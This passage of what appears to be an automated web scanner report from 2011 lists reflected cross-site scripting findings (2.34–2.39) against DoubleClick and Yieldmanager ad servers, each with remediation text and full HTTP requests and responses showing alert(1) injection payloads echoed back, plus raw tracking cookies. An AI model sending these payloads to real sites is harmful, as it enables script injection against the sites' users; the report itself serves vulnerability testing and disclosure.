Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=220cf0"-alert(1)-"da21d5ca8f4&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27
...[SNIP]...

2.34. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5db2"-alert(1)-"f4687176ca0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041b5db2"-alert(1)-"f4687176ca0&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3b05/17/14b/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041b5db2"-alert(1)-"f4687176ca0&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.
...[SNIP]...

2.35. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d73dc"-alert(1)-"0d4d57175ea was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52d73dc"-alert(1)-"0d4d57175ea&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52d73dc"-alert(1)-"0d4d57175ea&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250-_-BRAND_MEDLAR_NETWORKING_NA_300X250_A");
var fsc
...[SNIP]...

2.36. http://ad.doubleclick.net/adj/pcw.main.blogs/bizfeed/index [blg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pcw.main.blogs/bizfeed/index

Issue detail

The value of the blg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 523bc'%3balert(1)//b3b035e5bf1 was submitted in the blg parameter. This input was echoed as 523bc';alert(1)//b3b035e5bf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/pcw.main.blogs/bizfeed/index;blg=523bc'%3balert(1)//b3b035e5bf1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/blogs/id,61/bizfeed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6190
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:32:05 GMT
Expires: Thu, 12 May 2011 13:32:05 GMT

document.write('<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<VAST version=\"2.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceSchemaLocation=\"vast.xsd\"
...[SNIP]...
<![CDATA[http://ad.doubleclick.net/imp;v7;j;239708791;0-0;0;31663029;426/240;41597265/41615052/1;;~aopt=2/1/64/0;~okv=;blg=523bc';alert(1)//b3b035e5bf1;bsg=102491;bsg=104070;bsg=106172;bsg=102971;bsg=103565;bsg=103910;bsg=104468;bsg=104635;bsg=110475;bsg=110477;bsg=110478;bsg=110799;bsg=110802;bsg=110821;bsg=110021;;~cs=c%3fhttp://s0.2mdn.net/dot.gif
...[SNIP]...

2.37. http://ad.doubleclick.net/adj/pcw.main.news/products/computers/laptops/article [blg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pcw.main.news/products/computers/laptops/article

Issue detail

The value of the blg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b38c'%3balert(1)//7e42ef4a333 was submitted in the blg parameter. This input was echoed as 1b38c';alert(1)//7e42ef4a333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/pcw.main.news/products/computers/laptops/article;blg=1b38c'%3balert(1)//7e42ef4a333 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6190
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:28:56 GMT
Expires: Thu, 12 May 2011 13:28:56 GMT

document.write('<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<VAST version=\"2.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceSchemaLocation=\"vast.xsd\"
...[SNIP]...
<![CDATA[http://ad.doubleclick.net/imp;v7;j;239708791;0-0;0;28183100;426/240;41597265/41615052/1;;~aopt=2/1/64/0;~okv=;blg=1b38c';alert(1)//7e42ef4a333;bsg=102491;bsg=104070;bsg=106172;bsg=102971;bsg=103565;bsg=103910;bsg=104468;bsg=104635;bsg=110475;bsg=110477;bsg=110478;bsg=110799;bsg=110802;bsg=110821;bsg=110021;;~cs=y%3fhttp://s0.2mdn.net/dot.gif
...[SNIP]...

2.38. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d2b"><script>alert(1)</script>8aa7f7337f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=621649&65d2b"><script>alert(1)</script>8aa7f7337f5=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eG~M.jTN"; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!'=!>N?!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eG!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; vuday1=!!!!#NpqDMN==#3uKEgS; BX=8khj7j56qmjsh&b=4&s=dk&t=106; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp1v4-_5>3Qm_Z5lxm/ZqKA/a92

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:33:32 GMT
Pragma: no-cache
Content-Length: 4687
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?65d2b"><script>alert(1)</script>8aa7f7337f5=1&Z=728x90&s=621649&t=2" target="_parent">
...[SNIP]...

2.39. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33898"-alert(1)-"7c7717e2c00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=300&ad_type=ad&ad_size=300x250&section=1588565&33898"-alert(1)-"7c7717e2c00=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
